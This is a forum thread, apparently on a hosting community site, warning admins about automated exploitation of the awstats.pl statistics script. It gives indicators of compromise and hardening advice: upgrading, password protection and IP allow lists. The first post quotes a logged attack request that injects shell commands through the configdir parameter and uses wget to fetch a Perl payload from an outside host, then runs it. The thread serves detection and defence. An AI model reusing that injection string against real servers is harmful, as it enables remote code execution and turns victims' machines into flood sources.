View All Products
Compute
Storage
Networking
Databases
Services
Developer Tools
Industries
Pricing
Community
Engage With Us
Community Questions Beware of attacks against awstats.pl
Log in to Ask a Question

Beware of attacks against awstats.pl

general

If you use the awstats web statistics perl script, be warned that there is an automated process exploiting buffer overflow vulnerabilities and spawning off flood attacks. Anyone who uses awstats should check ASAP for the following things to see if you have been compromised:

1) Entries in your apache access logs with the following form: GET /awstats/awstats.pl?configdir

=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;

perl%20a1.txt|

2) The presense of running processes named 'udp.pl, egx, or f3', or the presense of these files on the filesystem (most likely in /var/tmp).

3) Lots of UDP traffic directed against random hosts (the processes use a random number generator using /dev/urandom to generate targets).

Fix: Remove, disable, or password protect awstats.pl. Unknown if there is a fix available.

John

6 Replies

Version 6.4 of awstats was released a bit over a month ago when this vulnerability was discovered. If you have installed awstats via apt-get or similiar and regularly run apt-get update && apt-get upgrade or your distribution of choice's equivilent, you should already have the fixed version installed but should double check this.

Michael

Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.

Probably an entire new thread, but in theory running Apache in a SELinux sandbox would go a long way to limit the consequences of an exploit of any script or the server process itself. Is SELinux even possible under UML (2.6 kernel)?

John

SELinux isn't installed in the UML kernel, so linodes can't take advantage of it.

Easiest way to protect your awstats? chmod 700 the folder when not viewing stats :)

@tierra:

Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.

I keep a lot of things like this (webalizer, server-status, munin) protected by .htaccess files that only allow access from my own IP (and the proxy server at work).

    Order deny,allow
    Deny from all
    Allow from 192.168.1.0/24
    Allow from 111.222.333.0/24
    Allow from 127.0.0.0/8

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Log in to Reply
Community Code of Conduct